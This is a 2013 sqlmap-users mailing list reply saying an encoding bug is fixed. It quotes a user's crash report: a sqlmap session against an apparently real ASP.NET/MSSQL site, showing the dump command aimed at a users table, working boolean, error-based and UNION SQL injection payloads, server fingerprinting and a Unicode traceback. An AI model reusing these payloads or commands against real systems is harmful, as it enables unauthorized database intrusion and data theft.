Re: [sqlmap-users] encode err ? thx
From: Miroslav S. <mir...@gm...> - 2013-09-21 10:25:27
Hi.

This should be fixed now.

Bye

On Sat, Sep 21, 2013 at 4:55 AM, 沸水浮冰 <sf...@gm...> wrote:

> root@anonymous:~/sqlmap-0905# ./sqlmap.py -r file2 -p 'major'
> --dbms=mssql --level=5 --risk=3 --tamper=base64encode -D vls3db4 -T
> dbo.dd_users -C '最后登录时间' --dump --hex -v 3
>
> sqlmap/1.0-dev-4cf49bc - automatic SQL injection and database takeover
> tool
> http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 00:51:25
>
> [00:51:25] [INFO] parsing HTTP request from 'file2'
> [00:51:25] [DEBUG] not a valid WebScarab log data
> [00:51:25] [DEBUG] cleaning up configuration parameters
> [00:51:25] [INFO] loading tamper script 'base64encode'
> [00:51:25] [DEBUG] setting the HTTP timeout
> [00:51:25] [DEBUG] setting the HTTP method to GET
> [00:51:25] [DEBUG] creating HTTP requests opener object
> [00:51:25] [DEBUG] forcing back-end DBMS to user defined value
> [00:51:25] [WARNING] it appears that you have provided tainted parameter
> values ('major=')waitfor delay'0:0:20'--') with most probably leftover
> chars/statements from manual SQL injection test(s). Please, always use only
> valid parameter values so sqlmap could be able to run properly
> Are you sure you want to continue? [y/N] y
> [00:51:26] [INFO] testing connection to the target URL
> [00:51:49] [DEBUG] declared web page charset 'gb2312'
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: GET
> Parameter: major
> Type: boolean-based blind
> Title: OR boolean-based blind - WHERE or HAVING clause
> Payload: classid=&specialid=2&qstr=&major=-1315') OR (1954=1954) AND
> ('IRZo'='IRZo&station=&idxpage=2&ptopid=
> Vector: OR ([INFERENCE])
>
> Type: error-based
> Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING
> clause
> Payload: classid=&specialid=2&qstr=&major=-3052') OR
> 5359=CONVERT(INT,(SELECT
> CHAR(113)+CHAR(122)+CHAR(118)+CHAR(121)+CHAR(113)+(SELECT (CASE WHEN
> (5359=5359) THEN CHAR(49) ELSE CHAR(48)
> END))+CHAR(113)+CHAR(101)+CHAR(99)+CHAR(99)+CHAR(113))) AND
> ('PLJO'='PLJO&station=&idxpage=2&ptopid=
> Vector: OR [RANDNUM]=CONVERT(INT,(SELECT
> '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
>
> Type: UNION query
> Title: Generic UNION query (random number) - 16 columns
> Payload: classid=&specialid=2&qstr=&major=-7814') UNION ALL SELECT
> CHAR(113)+CHAR(122)+CHAR(118)+CHAR(121)+CHAR(113)+CHAR(106)+CHAR(86)+CHAR(99)+CHAR(114)+CHAR(70)+CHAR(111)+CHAR(78)+CHAR(116)+CHAR(69)+CHAR(87)+CHAR(113)+CHAR(101)+CHAR(99)+CHAR(99)+CHAR(113),1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654--
> &station=&idxpage=2&ptopid=
> Vector: UNION ALL SELECT
> [QUERY],9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026--
>
> ---
> [00:51:49] [WARNING] changes made by tampering scripts are not included in
> shown payload content(s)
> [00:51:49] [INFO] testing Microsoft SQL Server
> [00:51:49] [DEBUG] performed 0 queries in 0.00 seconds
> [00:51:49] [INFO] confirming Microsoft SQL Server
> [00:51:49] [DEBUG] performed 0 queries in 0.00 seconds
> [00:51:49] [DEBUG] performed 0 queries in 0.00 seconds
> [00:51:49] [DEBUG] performed 0 queries in 0.00 seconds
> [00:51:49] [PAYLOAD]
> LTQ3MjInKSBVTklPTiBBTEwgU0VMRUNUIENIQVIoMTEzKStDSEFSKDEyMikrQ0hBUigxMTgpK0NIQVIoMTIxKStDSEFSKDExMykrKENBU0UgV0hFTiAoQ09OQ0FUKE5VTEwsTlVMTCk9Q09OQ0FUKE5VTEwsTlVMTCkpIFRIRU4gQ0hBUig0OSkgRUxTRSBDSEFSKDQ4KSBFTkQpK0NIQVIoMTEzKStDSEFSKDEwMSkrQ0hBUig5OSkrQ0hBUig5OSkrQ0hBUigxMTMpLDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LS0g
> [00:51:50] [DEBUG] performed 1 queries in 0.57 seconds
> [00:51:50] [INFO] the back-end DBMS is Microsoft SQL Server
> web server operating system: Windows 2003
> web application technology: ASP.NET, Microsoft IIS 6.0
> back-end DBMS: Microsoft SQL Server 2008
> [00:51:50] [INFO] fetching columns '最后登录时间' for table 'dd_users' in
> database 'vls3db4'
> [00:51:50] [INFO] the SQL query used returns 1 entries
> [00:51:50] [DEBUG] performed 0 queries in 0.02 seconds
> [00:51:50] [INFO] fetching entries of column(s) '[最后登录时间]' for table
> 'dd_users' in database 'vls3db4'
> [00:51:50] [DEBUG] performed 0 queries in 0.00 seconds
> [00:51:50] [INFO] fetching number of distinct values for column '[最后登录时间]'
>
> Traceback (most recent call last):
> File "/root/sqlmap-0905/thirdparty/ansistrm/ansistrm.py", line 51, in
> emit
> message = stdoutencode(self.format(record))
> File "/root/sqlmap-0905/lib/core/convert.py", line 160, in stdoutencode
> retVal = data.encode(UNICODE_ENCODING)
> UnicodeDecodeError: 'ascii' codec can't decode byte 0xe6 in position 688:
> ordinal not in range(128)
> Logged from file sqlmap.py, line 125
> Traceback (most recent call last):
> File "./sqlmap.py", line 95, in main
> start()
> File "/root/sqlmap-0905/lib/controller/controller.py", line 582, in start
> action()
> File "/root/sqlmap-0905/lib/controller/action.py", line 127, in action
> conf.dbmsHandler.dumpTable()
> File "/root/sqlmap-0905/plugins/generic/entries.py", line 155, in
> dumpTable
> retVal = pivotDumpTable(table, colList, blind=False)
> File "/root/sqlmap-0905/lib/utils/pivotdumptable.py", line 86, in
> pivotDumpTable
> value = inject.getValue(query, blind=blind, union=not blind, error=not
> blind, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
> File "/root/sqlmap-0905/lib/request/inject.py", line 360, in getValue
> value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else
> query, unpack, dump)
> File "/root/sqlmap-0905/lib/request/inject.py", line 312, in _goUnion
> output = unionUse(expression, unpack=unpack, dump=dump)
> File "/root/sqlmap-0905/lib/techniques/union/use.py", line 334, in
> unionUse
> output = _oneShotUnionUse(expression, unpack)
> File "/root/sqlmap-0905/lib/techniques/union/use.py", line 73, in
> _oneShotUnionUse
> page, headers = Request.queryPage(payload, content=True,
> raise404=False)
> File "/root/sqlmap-0905/lib/request/connect.py", line 641, in queryPage
> payload = function(payload=payload, headers=auxHeaders)
> File "/root/sqlmap-0905/tamper/base64encode.py", line 25, in tamper
> return base64.b64encode(payload) if payload else payload
> File "/usr/lib/python2.7/base64.py", line 53, in b64encode
> encoded = binascii.b2a_base64(s)[:-1]
> UnicodeEncodeError: 'ascii' codec can't encode characters in position
> 147-152: ordinal not in range(128)
>
> [*] shutting down at 00:51:50

--
Miroslav Stampar
http://about.me/stamparm